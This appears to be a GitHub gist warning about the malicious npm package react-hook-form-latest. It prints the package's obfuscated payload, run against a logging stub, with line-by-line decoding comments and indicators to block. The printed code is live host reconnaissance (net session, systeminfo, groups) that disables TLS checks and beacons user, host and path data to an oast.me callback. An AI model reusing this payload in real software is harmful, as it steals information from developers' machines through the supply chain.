@alexanderankin
Created December 24, 2023 01:57
PSA - npm malware analysis
// the react-hook-form-latest package is malware
// https://www.npmjs.com/package/react-hook-form-latest/v/37.3.6?activeTab=code
var require = function(moduleName) {
console.log('requiring', moduleName);
return new Proxy({ moduleName }, {
get(target, prop, receiver) {
console.log('getting field', prop, 'from target', target)
switch(target.moduleName) {
case 'os': {
switch(prop) {
case 'hostname': { return () => 'localhost'; }
case 'userInfo': { return () => 'me'; }
case 'platform': { return () => 'lin'; }
}
break;
}
case 'child_process': {
switch(prop) {
case 'execSync': { return function() { console.log('called', prop ,'with arguments', arguments); } }
}
break;
}
case 'https': {
switch(prop) {
case 'request': {
return function() {
console.log('called', prop ,'with arguments', arguments);
return {
end() {
console.log('called end on request from arguments', arguments)
}
}
}
}
}
}
}
console.log('no match')
return {};
}
});
}
// ---------------------------------------------------------------------------
// Everything from here down is the sample's own code as shipped in the
// package, executed against the stubbed `require` above. It is the output of
// a javascript-obfuscator style pass: hex-escaped string literals, a string
// table that is rotated at start-up, and integer-keyed lookups into it. The
// decode annotations below were produced by hand: every lookup resolves to
// table[index - 0xa2] once the rotation loop has settled, and the decoded
// values are consistent with the table having been rotated 24 places.
// ---------------------------------------------------------------------------
// Alias for the string-table lookup used throughout the payload.
var _0x51da54 = _0x587a;
// Rotation loop. `_0x128333` is the table getter, `_0x608f35` the expected
// checksum (0xc8392). Each pass combines parseInt() of the numeric-prefixed
// filler entries into one integer; until it equals the target the table is
// rotated one step left (push(shift())). A non-numeric entry yields NaN rather
// than throwing, and the catch branch rotates as well, so the loop only exits
// on a checksum match.
(function(_0x128333, _0x608f35) {
var _0x5dd588 = _0x587a,
_0x56d04e = _0x128333();
while (!![]) {
try {
var _0x3134cb = parseInt(_0x5dd588(0xb0)) / 0x1 * (parseInt(_0x5dd588(0xb6)) / 0x2) + -parseInt(_0x5dd588(0xa6)) / 0x3 + -parseInt(_0x5dd588(0xbf)) / 0x4 * (parseInt(_0x5dd588(0xa9)) / 0x5) + -parseInt(_0x5dd588(0xa5)) / 0x6 + parseInt(_0x5dd588(0xa7)) / 0x7 * (parseInt(_0x5dd588(0xb4)) / 0x8) + -parseInt(_0x5dd588(0xa3)) / 0x9 + parseInt(_0x5dd588(0xad)) / 0xa * (parseInt(_0x5dd588(0xb7)) / 0xb);
if (_0x3134cb === _0x608f35) break;
else _0x56d04e['push'](_0x56d04e['shift']());
} catch (_0x5bf068) {
_0x56d04e['push'](_0x56d04e['shift']());
}
}
}(_0x5371, 0xc8392));
// Host reconnaissance via the real `os` module ('\x6f\x73' is 'os').
// Decoded lookups: 0xc0 -> 'hostname', 0xb2 -> 'userInfo', 0xab -> 'username';
// the hex literal on the platform line is 'platform'.
var os = require('\x6f\x73'),
hostname = os[_0x51da54(0xc0)](),
username = os[_0x51da54(0xb2)]()[_0x51da54(0xab)],
platform = os['\x70\x6c\x61\x74\x66\x6f\x72\x6d'](),
admin_text;
// Windows branch (0xae -> 'win32'; the literal is 'win64', a value Node's
// os.platform() never actually returns). 0xbe -> 'child_process',
// 0xb3 -> 'execSync', 0xbd -> 'net session': that command is commonly used
// as an elevation probe, since it fails without administrator rights, so
// success stores 'admin' (0xa4) and the catch stores 'non-admin' (0xc1).
// `net_session` is assigned without a declaration, i.e. an implicit global.
if (platform == _0x51da54(0xae) || platform == '\x77\x69\x6e\x36\x34') {
try {
net_session = require('\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73')[_0x51da54(0xb3)](_0x51da54(0xbd)), admin_text = _0x51da54(0xa4);
} catch {
admin_text = _0x51da54(0xc1);
}
// Prefixes the login name with the machine's domain: runs
// 'systeminfo | findstr /B Domain' (0xaf), converts the output with
// toString (0xb5), strips the 'Domain:' label with replace (0xb8), trims
// (0xa2) and joins the two with '/'. No try/catch here, so a failing
// systeminfo call would abort the sample before the beacon is sent.
username = require(_0x51da54(0xbe))[_0x51da54(0xb3)](_0x51da54(0xaf))[_0x51da54(0xb5)]()[_0x51da54(0xb8)]('\x44\x6f\x6d\x61\x69\x6e\x3a', '')[_0x51da54(0xa2)]() + '\x2f' + username;
} else {
// Non-Windows branch: admin_text starts as the numeric uid (0xbc -> 'uid'),
// then the output of the 'groups' command (0xba) is appended after a space;
// replace('\n', '') with a string pattern removes only the first newline.
// Any failure of the command is silently swallowed.
admin_text = os[_0x51da54(0xb2)]()[_0x51da54(0xbc)];
try {
const {
execSync
} = require(_0x51da54(0xbe));
let stdout = execSync(_0x51da54(0xba))['\x74\x6f\x53\x74\x72\x69\x6e\x67']()[_0x51da54(0xb8)]('\x0a', '');
admin_text += '\x20' + stdout;
} catch {}
}
// Disables TLS certificate verification for the whole process
// (0xa8 -> 'env'; the literal is NODE_TLS_REJECT_UNAUTHORIZED), so the
// beacon below still goes through behind an intercepting proxy. A library
// has no legitimate reason to set this, which makes it a strong detection
// signal on its own.
process[_0x51da54(0xa8)]['\x4e\x4f\x44\x45\x5f\x54\x4c\x53\x5f\x52\x45\x4a\x45\x43\x54\x5f\x55\x4e\x41\x55\x54\x48\x4f\x52\x49\x5a\x45\x44'] = 0x0;
// Exfiltration beacon: an HTTPS GET (0xaa -> 'https', 0xb9 -> 'GET',
// 0xbb -> 'request') to the hard-coded callback host from the string table
// (0xac -> 'cig6l3l34eboiti6qhjgqe31j19h8sg9d.oast.me', which looks like an
// out-of-band interaction service hostname) on port 0x1bb = 443. The option
// keys decode to hostname / port / path / method. The path is
// '/?Username=' + encodeURI('<username> (<admin_text>)') + '&Hostname=' +
// encodeURI(hostname) + '&Package=react-hook-form-latest&PWD=' + __dirname,
// so the install directory (which can reveal the project and the user's home
// path) is leaked along with the account and host names. Note __dirname is
// appended without encoding. The request is sent with end() ('\x65\x6e\x64').
const https = require(_0x51da54(0xaa)),
options = {
'\x68\x6f\x73\x74\x6e\x61\x6d\x65': _0x51da54(0xac),
'\x70\x6f\x72\x74': 0x1bb,
'\x70\x61\x74\x68': _0x51da54(0xb1) + encodeURI(username + '\x20\x28' + admin_text + '\x29') + '\x26\x48\x6f\x73\x74\x6e\x61\x6d\x65\x3d' + encodeURI(hostname) + '\x26\x50\x61\x63\x6b\x61\x67\x65\x3d\x72\x65\x61\x63\x74\x2d\x68\x6f\x6f\x6b\x2d\x66\x6f\x72\x6d\x2d\x6c\x61\x74\x65\x73\x74\x26\x50\x57\x44\x3d' + __dirname,
'\x6d\x65\x74\x68\x6f\x64': _0x51da54(0xb9)
},
req = https[_0x51da54(0xbb)](options);
req['\x65\x6e\x64']();
// String-table lookup. On the first call it fetches the table from _0x5371(),
// replaces its own binding with a closure that indexes that table at
// (index - 0xa2), then forwards the call to the closure. The table is held by
// reference, so the in-place rotation done by the IIFE above is what this
// closure sees afterwards. The second parameter is never used; the aliased
// `_0x51da54` still points at this outer function, which simply delegates.
function _0x587a(_0x2f95b2, _0x3a5b19) {
var _0x5371a7 = _0x5371();
return _0x587a = function(_0x587a48, _0xc0d313) {
_0x587a48 = _0x587a48 - 0xa2;
var _0x24f088 = _0x5371a7[_0x587a48];
return _0x24f088;
}, _0x587a(_0x2f95b2, _0x3a5b19);
}
// Obfuscated string table (32 hex-escaped entries) with self-memoisation:
// the first call builds the array and rebinds _0x5371 to return that same
// array object from then on. Decoded, in original (pre-rotation) order:
//   'https', 'username', 'cig6l3l34eboiti6qhjgqe31j19h8sg9d.oast.me',
//   '34390690FKLpDK', 'win32', 'systeminfo | findstr /B Domain',
//   '222141iEqWqy', '/?Username=', 'userInfo', 'execSync', '568fOPEyF',
//   'toString', '8ruxAue', '11Fszdwt', 'replace', 'GET', 'groups',
//   'request', 'uid', 'net session', 'child_process', '15596aZRAQX',
//   'hostname', 'non-admin', 'trim', '2890179coPTFc', 'admin',
//   '9723648ogEZKj', '1636920cQovUD', '35119dvtZIZ', 'env', '1765DPUPve'.
// The entries that start with digits are filler consumed only by the
// checksum in the rotation loop; the rest are the property names, commands
// and the callback host the payload uses. The callback host and the
// 'react-hook-form-latest' package name are the indicators worth blocking
// and searching for in install logs and egress records.
function _0x5371() {
var _0x114f34 = ['\x68\x74\x74\x70\x73', '\x75\x73\x65\x72\x6e\x61\x6d\x65', '\x63\x69\x67\x36\x6c\x33\x6c\x33\x34\x65\x62\x6f\x69\x74\x69\x36\x71\x68\x6a\x67\x71\x65\x33\x31\x6a\x31\x39\x68\x38\x73\x67\x39\x64\x2e\x6f\x61\x73\x74\x2e\x6d\x65', '\x33\x34\x33\x39\x30\x36\x39\x30\x46\x4b\x4c\x70\x44\x4b', '\x77\x69\x6e\x33\x32', '\x73\x79\x73\x74\x65\x6d\x69\x6e\x66\x6f\x20\x7c\x20\x66\x69\x6e\x64\x73\x74\x72\x20\x2f\x42\x20\x44\x6f\x6d\x61\x69\x6e', '\x32\x32\x32\x31\x34\x31\x69\x45\x71\x57\x71\x79', '\x2f\x3f\x55\x73\x65\x72\x6e\x61\x6d\x65\x3d', '\x75\x73\x65\x72\x49\x6e\x66\x6f', '\x65\x78\x65\x63\x53\x79\x6e\x63', '\x35\x36\x38\x66\x4f\x50\x45\x79\x46', '\x74\x6f\x53\x74\x72\x69\x6e\x67', '\x38\x72\x75\x78\x41\x75\x65', '\x31\x31\x46\x73\x7a\x64\x77\x74', '\x72\x65\x70\x6c\x61\x63\x65', '\x47\x45\x54', '\x67\x72\x6f\x75\x70\x73', '\x72\x65\x71\x75\x65\x73\x74', '\x75\x69\x64', '\x6e\x65\x74\x20\x73\x65\x73\x73\x69\x6f\x6e', '\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73', '\x31\x35\x35\x39\x36\x61\x5a\x52\x41\x51\x58', '\x68\x6f\x73\x74\x6e\x61\x6d\x65', '\x6e\x6f\x6e\x2d\x61\x64\x6d\x69\x6e', '\x74\x72\x69\x6d', '\x32\x38\x39\x30\x31\x37\x39\x63\x6f\x50\x54\x46\x63', '\x61\x64\x6d\x69\x6e', '\x39\x37\x32\x33\x36\x34\x38\x6f\x67\x45\x5a\x4b\x6a', '\x31\x36\x33\x36\x39\x32\x30\x63\x51\x6f\x76\x55\x44', '\x33\x35\x31\x31\x39\x64\x76\x74\x5a\x49\x5a', '\x65\x6e\x76', '\x31\x37\x36\x35\x44\x50\x55\x50\x76\x65'];
_0x5371 = function() {
return _0x114f34;
};
return _0x5371();
}